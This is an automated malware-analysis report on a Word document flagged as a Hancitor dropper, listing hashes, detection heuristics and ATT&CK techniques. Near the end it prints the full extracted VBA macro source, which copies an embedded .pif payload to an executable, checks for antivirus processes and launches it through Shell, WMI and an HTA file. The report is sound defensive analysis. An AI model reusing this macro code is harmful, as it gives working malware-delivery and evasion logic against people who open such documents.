Office (OLE) malware analysis — malicious · 3651a332eae5a4ba

MALICIOUS

Office (OLE)

211.0 KB Created: 2018-07-24 12:02:00 Authoring application: Microsoft Office Word First seen: 2019-03-10

MD5: 864bc5cfba574400353cb30efad9e033 SHA-1: 3f2ecb819f2129a1ef13ca4f2994e8096873396c SHA-256: 3651a332eae5a4ba7a8f52d7e9a7d214f9537a7fb70761f86f5408b7049da03e

680 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1140 Deobfuscate or Obfuscate Malicious Code T1071.001 Web Protocols

This Office document contains VBA macros that are triggered by the Document_Open event. The macros utilize WScript.Shell and WMI to execute a second-stage payload, indicated by the decoded command 'WINDOWSTATE="normal"> <script type="text/javascript" language="javascript"> WshShell = new ActiveXObject("WScript.Shell"); WshShell.Run("6.exe", 1, false); </script> <SCRIPT LANGUAGE="VBScript"'. The presence of VirtualProtect API calls and XOR-encoded strings further suggests malicious activity, likely for code execution and obfuscation.

Heuristics 18

Office EPRINT stream contains EMF object high CVE related OLE_EPRINT_EMF_OBJECT

OLE ObjectPool contains an EPRINT stream with EMF data. This is rare in normal documents and is related Office object-delivery evidence when paired with exploit payload anomalies, but the malformed graphics record required for exact CVE attribution is not proven by this rule alone.
ClamAV: Doc.Dropper.Hancitor-6774061-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Hancitor-6774061-0

XOR-encoded strings (key 0x40) critical SC_XOR_ENCODED

Found 3 Windows library/API name(s) XOR-encoded with single-byte key 0x40: 'LoadLibraryA', 'GetProcAddress', 'VirtualAlloc'

Disassembly

x86 disassembly · validity: uncertain (0.584) — 2/2 branch targets land on an instruction boundary (100% coherence)

00020ECB  0c2f              or al, 0x2f
00020ECD  21240c            and dword ptr [esp + ecx], esp
00020ED0  2922              sub dword ptr [edx], esp
00020ED2  3221              xor ah, byte ptr [ecx]
00020ED4  3239              xor bh, byte ptr [ecx]
00020ED6  0140c3            add dword ptr [eax - 0x3d], eax
00020ED9  8043c9c5          add byte ptr [ebx - 0x37], 0xc5
00020EDD  58                pop eax
00020EDE  bfbfbf18cb        mov edi, 0xcb18bfbf
00020EE3  c558bf            lds ebx, ptr [eax - 0x41]
00020EE6  bfbf10cb0d        mov edi, 0xdcb10bf
00020EEB  b011              mov al, 0x11
00020EED  bf1598c9c5        mov edi, 0xc5c99815
00020EF2  74bf              je 0x20eb3
00020EF4  bfbf10a840        mov edi, 0x40a810bf
00020EF9  40                inc eax
00020EFA  40                inc eax
00020EFB  40                inc eax
00020EFC  18ab4d162932      sbb byte ptr [ebx + 0x3229164d], ch
00020F02  3435              xor al, 0x35
00020F04  212c01            and dword ptr [ecx + eax], ebp
00020F07  2c2c              sub al, 0x2c
00020F09  2f                das
00020F0A  2340c3            and eax, dword ptr [eax - 0x3d]
00020F0D  8043c9c5          add byte ptr [ebx - 0x37], 0xc5
00020F11  78bf              js 0x20ed2
00020F13  bfbf18cbd5        mov edi, 0xd5cb18bf
00020F18  78bf              js 0x20ed9
00020F1A  bfbf12cb05        mov edi, 0x5cb12bf
00020F1F  b010              mov al, 0x10
00020F21  bf1598c905        mov edi, 0x5c99815
00020F26  f8                clc
00020F27  10                .byte 0x10
00020F28  a840              test al, 0x40
00020F2A  40                inc eax

Ole10Native package drops an auto-executable payload critical OFFICE_PACKAGE_RISKY_FILE

OLE Package displayName or fullPath ends in a directly auto-executable extension (a runnable binary or a script the default shell host runs on double-click). Embedding such a payload inside an Office document has no benign authoring use — it is a malware-delivery dropper.
VBA macros detected medium 9 related findings OLE_VBA_MACROS

Document contains VBA macro code

Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA

Matched line in script

  Shell StrConv(DecodeBase64("Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3QgLW4gMTAwICYmIA=="), vbUnicode) & Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & "\6.e" & "x" & "e", vbHide

WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage
Matched line in script
```
Set wsh = VBA.CreateObject("WScript.Shell")
```
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE

VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
Matched line in script
```
Set gDvcvsd = GetObject("wi" & "nmgmts:")
```
VBA Base64-decoded Shell command stager critical OLE_VBA_BASE64_SHELL_COMMAND_STAGER

VBA auto-exec macro decodes Base64 string literals into command or script-launch text and executes the result with Shell. This catches cmd/cscript/PowerShell/VBS launchers hidden from plain keyword matching.
Matched line in script
```
Set gDvcvsd = GetObject("wi" & "nmgmts:")
```
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set wsh = VBA.CreateObject("WScript.Shell")
```
GetObject call high OLE_VBA_GETOBJ

GetObject call
Matched line in script
```
Set gDvcvsd = GetObject("wi" & "nmgmts:")
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_Open()
```
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Matched line in script
```
Open Environ("Temp") & "\1.hta" For Output As #1
```
Reference to Windows Script Host high SC_STR_WSCRIPT

Reference to Windows Script Host
Reference to VirtualProtect API medium SC_STR_VIRTUALPROTECT

Reference to VirtualProtect API
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	5831 bytes
SHA-256: `2334c61645937599dbb58927896e4076c8fc8d425a3532fac86ec4cb513493b3`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 2 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() On Error Resume Next Call kfs Call sdfsdf Set d = New DataObject d.SetText " " d.PutInClipboard Selection.MoveUp Unit:=wdScreen, Count:=7 Selection.MoveUp Unit:=wdScreen, Count:=7 Selection.MoveLeft Unit:=wdCharacter, Count:=13 Dim t As Date t = Now Do DoEvents Loop Until Now >= DateAdd("s", 3, t) Call Module1.killo End Sub Private Sub Document_Close() Call closee End Sub Private Function DecodeBase64(ByVal strData As String) As Byte() Dim objXML As MSXML2.DOMDocument Dim objNode As MSXML2.IXMLDOMElement Set objXML = New MSXML2.DOMDocument Set objNode = objXML.createElement("b64") objNode.dataType = "bin.base64" objNode.Text = strData DecodeBase64 = objNode.nodeTypedValue Set objNode = Nothing Set objXML = Nothing End Function Attribute VB_Name = "Module1" Sub killo() ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatXMLDocument Application.Quit End Sub Attribute VB_Name = "Module2" Sub closee() Dim Hdfgdwd, gDvcvsd Dim fdfdgsd Set gDvcvsd = GetObject("wi" & "nmgmts:") Dim gfdfsfsfs Set Hdfgdwd = gDvcvsd.ExecQuery("SELECT * FROM Win32_Process") Dim hdffsdfs For Each x In Hdfgdwd Set wsh = VBA.CreateObject("WScript.Shell") Dim pipec As Boolean: pipec = True If x.Name = "bdagent.exe" Then Dim kk kk = StrConv(DecodeBase64("IFdJTkRPV1NUQVRFPSJub3JtYWwiPg0KICAgIDxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0IiBsYW5ndWFnZT0iamF2YXNjcmlwdCI+DQogICAgDQogICAgICAgIFdzaFNoZWxsID0gbmV3IEFjdGl2ZVhPYmplY3QoIldTY3JpcHQuU2hlbGwiKTsNCiAgICAgICAgV3NoU2hlbGwuUnVuKCI2LmV4ZSIsIDEsIGZhbHNlKTsNCiAgICAgICAgDQogICAgPC9zY3JpcHQ+DQogPFNDUklQVCBMQU5HVUFHRT0iVkJTY3JpcHQiPg0KICAgICAgICAgIFdpbmRvdy5DbG9zZQ0KICAgICA8L1NDUklQVD4NCjwvaGVhZD4NCjxib2R5Pg0KICAgDQo8L2JvZHk+DQo8L2h0bWw+DQo="), vbUnicode) Open Environ("Temp") & "\1.hta" For Output As #1 Print #1, StrConv(DecodeBase64("PGh0bWw+DQo8aGVhZD4NCiA8U0NSSVBUIExBTkdVQUdFPSJWQlNjcmlwdCI+DQogICAgICAgICAgV2luZG93Lk1vdmVUbyAtMzIwMDAsIC0zMjAwMA0KICAgICA8L1NDUklQVD4NCiAgICA8dGl0bGU+QXBwbGljYXRpb24gRXhlY3V0ZXI8L3RpdGxlPg0KICAgIDxIVEE6QVBQTElDQVRJT04gSUQ9Im9NeUFwcCIgDQogICAgICAgIEFQUExJQ0FUSU9OTkFNRT0iQXBwbGljYXRpb24gRXhlY3V0ZXIiIA0KICAgICAgICBCT1JERVI9Im5vIg0KICAgICAgICBDQVBUSU9OPSJubyINCiAgICAgICAgU0hPV0lOVEFTS0JBUj0ieWVzIg0KICAgICAgICBTSU5HTEVJTlNUQU5DRT0ieWVzIg0KICAgICAgICBTWVNNRU5VPSJ5ZXMiDQogICAgICAgIFNDUk9MTD0ibm8i"), vbUnicode) Print #1, kk Close #1 ChDir Environ("Temp") wsh.Run Environ("Temp") & "\1.hta", 0, False Exit Sub End If If x.Name = "PSUAMain.exe" Then Shell StrConv(DecodeBase64("Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3QgLW4gMTAwICYmIA=="), vbUnicode) & Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & "\6.e" & "x" & "e", vbHide Exit Sub End If If x.Name = "n360.exe" Then Shell Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & "\6.e" & "x" & "e", vbHide Exit Sub End If Next Shell StrConv(DecodeBase64("Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3QgLW4gMTAwICYmIA=="), vbUnicode) & Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & StrConv(DecodeBase64("XDYucGlm"), vbUnicode), vbHide End Sub Private Function DecodeBase64(ByVal strData As String) As Byte() Dim objXML As MSXML2.DOMDocument Dim objNode As MSXML2.IXMLDOMElement Set objXML = New MSXML2.DOMDocument Set objNode = objXML.createElement("b64") objNode.dataType = "bin.base64" objNode.Text = strData DecodeBase64 = objNode.nodeTypedValue Set objNode = Nothing Set objXML = Nothing End Function Attribute VB_Name = "Module3" Sub kfs() Selection.MoveDown Unit:=wdScreen, Count:=7 Selection.MoveDown Unit:=wdScreen, Count:=7 Selection.MoveRight Unit:=wdCharacter, Count:=24 Selection.TypeBackspace Selection.Copy End Sub Attribute VB_Name = "Module4" Sub sdfsdf() Dim kk, lll, jgf jgf = "." & "p" & "i" & "f" lll = "6" & ".e" & "x" & "e" kk = ".p" & "if" ChDir Environ("Temp") Selection.TypeBackspace Dim FSO As Object Set FSO = CreateObject("scripting.filesystemobject") FSO.copyfile Source:="5C" & jgf, Destination:=lll FSO.copyfile Source:="5C" & kk, Destination:="6" & UserForm1.TextBox1.Text End Sub Private Function DecodeBase64(ByVal strData As String) As Byte() Dim objXML As MSXML2.DOMDocument Dim objNode As MSXML2.IXMLDOMElement Set objXML = New MSXML2.DOMDocument Set objNode = objXML.createElement("b64") objNode.dataType = "bin.base64" objNode.Text = strData DecodeBase64 = objNode.nodeTypedValue Set objNode = Nothing Set objXML = Nothing End Function Attribute VB_Name = "UserForm3" Attribute VB_Base = "0{C15E5D10-EA1A-4675-8344-E4EC77A61762}{F8F67BAB-9581-4A46-BB4B-EA41F02BB5B7}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "UserForm1" Attribute VB_Base = "0{02C1F6EF-A6C3-451F-B117-07A65A835E9C}{A3F975E9-AF87-4060-B351-1DCE518ED2A8}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False
`ole10native_00.bin`	ole-package	OLE Ole10Native stream: ObjectPool/_1598104975/Ole10Native	69908 bytes
SHA-256: `3bd66f724d16569acc6db9fc938afa5185e41dc00ddfc037fc56f01155ab3665`
`ole10native_00_5C.pif`	ole-package-payload	OLE Ole10Native payload: ObjectPool/_1598104975/Ole10Native; display_name=5C.pif; full_path=C:\Users\win7home\AppData\Local\Temp\5C.pif; temp_path=; def_file=	69632 bytes
SHA-256: `a8137c26efb6e13e4a8d5c7ee8becc3e3e6f5fcb5281bfb05ca8b0a779392307`

Open this report in the interactive analyzer, or submit your own file for analysis.